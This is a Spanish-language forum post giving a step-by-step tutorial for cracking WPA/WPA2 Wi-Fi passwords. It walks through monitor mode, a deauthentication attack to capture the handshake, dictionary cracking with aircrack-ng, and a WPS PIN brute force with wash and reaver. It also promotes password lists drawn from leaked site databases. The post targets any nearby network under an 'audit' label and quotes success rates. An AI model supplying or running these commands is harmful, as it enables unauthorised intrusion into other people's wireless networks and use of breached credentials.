1. #1
    Recien Nacido

    Fecha de ingreso
    31 ene, 13
    Mensajes
    6
    Gracias
    1
    Agradecido 0 veces en 0 Mensajes

    Predeterminado Descifrar Claves Wpa/Wpa2 -Psk-Tkip-Aes



    Les dejo un excelente listado de diccionarios recopilado, varios diccionario claves wpa listos para ser utilizados en tu herramienta preferida para realizar fuerza bruta, que puede utilizarse también como diccionario claves wpa para descifrar claves WPA/WPA2

    Diccionarios 1


    Diccionarios 2


    Los diccionarios de passwords, esos archivos que tanto usamos en nuestros ataques de fuerza bruta, con la esperanza de encontrar en su interior una combinación de letras, que formen la contraseña de algún usuario en un servicio que estemos auditando, son de gran ayuda e indispensables en la caja de herramientas de cualquier auditor; Podemos encontrar listas de passwords con nombres comunes, nombres de famosos, de películas, de ciudades, con los passwords mas utilizados, e incluso crear o extrapolar nuevos… pero hoy traigo otro tipo de passwords, passwords de sitios cuyas bases de datos han sido expuestas en la red.


    Pasos para Descifrar Claves WPA/WPA2 con Diccionarios :


    1.-ver nuestras interfaces


    airmon-ng


    airmon-ng



    2.- seleccionar una interfaz y ponerla en modo monitor:


    airmon-ng start wlan1



    3.- Escanear las redes que estén cerca:


    airodump-ng mon0





    4.- seleccionar la red a atacar y capturar paquetes únicamente de la red seleccionada:


    airodump-ng -c -w wpa2 –bssid “Poner MAC” mon0




    5.- ahora vamos a capturar el HandShake, para eso vamos a desconectar a la persona que este conectada en el modem y obligarla a que se vuelva a conectar y en ese momento tendremos el HandShake:


    aireplay-ng -0 20 -a “Poner la MAC” -c ”Poner la Station” mon0




    6.- Cuando tengamos el HandShake se mostrara en la parte de arriba de la terminal:





    7.- Vamos a cargar un diccionario primero ponemos ls


    ls





    8.-Ahora cargamos el diccionario, en mi caso guarde todo en la carpeta root, si lo guardaste en otra parte pon la ubicación del archivo, también debes poner el el archivo que guardamos y en el que capturamos el handshake en mi caso se llamo “wpa2″. ejemplo de todo y el comando:


    aircrack-ng -w diccionario.lst /root/wpa2-01.cap




    8.- Ahora ya comenzamos a probar las contraseñas que vienen en el diccionario. Este es solo de prueba, el diccionario ya esta desactualizado pero así se vera cuando este buscando el password:




    9.- Con un diccionario completo tienes mayor posibilidades de encontrar el password o la clave y cuando termine y la encuentre se vera así:





    Atacar una red con diccionario es efectivo en un 80% si es que el usuario no a modificado o personalizado su contraseña, se puede dar cuenta, cuando el usuario a cambiado su contraseña por que normal mente también cambia el nombre de su red.


    Si el usuario ha cambiado su clave y la personalizo, tendremos una posibilidad de tener éxito de un 30% a un 60% de descifrar su contraseña con diccionarios.


    ————————————————————————————-


    AHORA VAMOS CON REAVER


    También tenemos la segunda opción para descifrar claves wpa/wpa2 con REAVER el cual es mas facil, si es que el modem al que vamos a atacar cuenta con el sistema WPS.


    Básicamente el fallo en WPS descubierto por Viehböck es que uno de los 4 métodos de autenticación ofrecidos por el estándar, en el que se utilizan un PIN de 8 dígitos, no limita el numero de intentos erróneos, permitiendo ataques de fuerza bruta, pero además, con solo enviar los primeros 4 dígitos del PIN, si estos son erróneos, el sistema responde con un EAP-NACK evitando así que se tengan que procesar los siguientes 4 dígitos y facilitando la tarea del atacante quien no tendrá que procesar 100 millones de contraseñas sino solo 20.000.


    1.- Lo primero que debemos hacer es ver nuestras interfaces:


    airmon-ng




    2.- Después seleccionar una interfaz y ponerla en modo monitor:


    airmon-ng start wlan1



    3.- Después escanear las redes que estén a nuestro alcance:

    airodump-ng mon0



    4.-Ahora antes de realizar el ataque con REAVER verificar primero que el modem que vayamos a atacar cuente con el sistema WPS para ello utilizamos el siguiente comando en el cual pondremos la MAC del modem que seleccionemos y nos dirá en la parte ”Wps Locked” si el wps esta activado o no, saldrá YES / NO si dice YES entonces podremos utilizar RAVER de lo contrario entonces nos conviene mejor realizar un ataque con DICCIONARIOS.


    wash -i mon0 -b “Poner la MAC “





    5.- Ya que confirmamos que el wps esta activado entonces realizamos el ataque con REAVER


    reaver -i mon0 -b “Poner la MAC del moden que vas a atacar” -vv



    REAVER comenzara realizar el ataque, les mostrara las peticiones que vaya realizando y al final les mostrara la contraseña o clave y el PIN del sistema WPS. Esto puede tardar dependiendo de la intensidad de la señal Wifi y puede tomar 2 – 3 – 8 – 12 – 15 Horas.











    WPA2 AES es la mas fuerte sin embargo con REAVER no resulta ningún problema, solo es cuestión de tiempo. por el momento es el método mas efectivo para descifrar claves wpa y wpa2 ya que muy pronto los modems tendrán otro tipo de seguridad y estos metodos dejaran de ser efectivos, como en este mundo de la tecnología NADA es 100% seguro y ya habrá mas herramientas para realizar auditorias WI-FI.
    Última edición por dante23; 21/09/2013 a las 23:46 Razón: alinear imagenes

Visitantes encuentran esta página buscando por:

romper claves wifi

descifrador claves wifi wpa

claves wifi wpa wpa2wpa2http:comunidad.dragonjar.orgf182descifrar-claves-wpa-wpa2-psk-tkip-aes-15129diccionario wpa psk 2013romper clavesdescifrar claves wifi wpaclaves wifi wpa2 pskdecifrar seguridad wpa2-pskclaves de wifi wpa2Desifrar clave wifi colombiatodos los modem. con wpa2 se pueden auditarwpa-psk tkip wpa2-psk aesdescifrar clave wpa2 wifidiccionario wpa wpa2 pskdescifrar claves wifi Colombia con seguridad wpa2 psk seguridad wpa wpa2 pskclaves aestkipcomo descifrar wifi seguridad wpa-psk (aes)descifrar claves wpa2-psk facildescifrar claves wifi personalizadasdescifrar wpa sin wps activadodecodificador claves wifisacar claves wifi en redes personalizadas

Etiquetas para este tema

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •  

Iniciar sesión

Iniciar sesión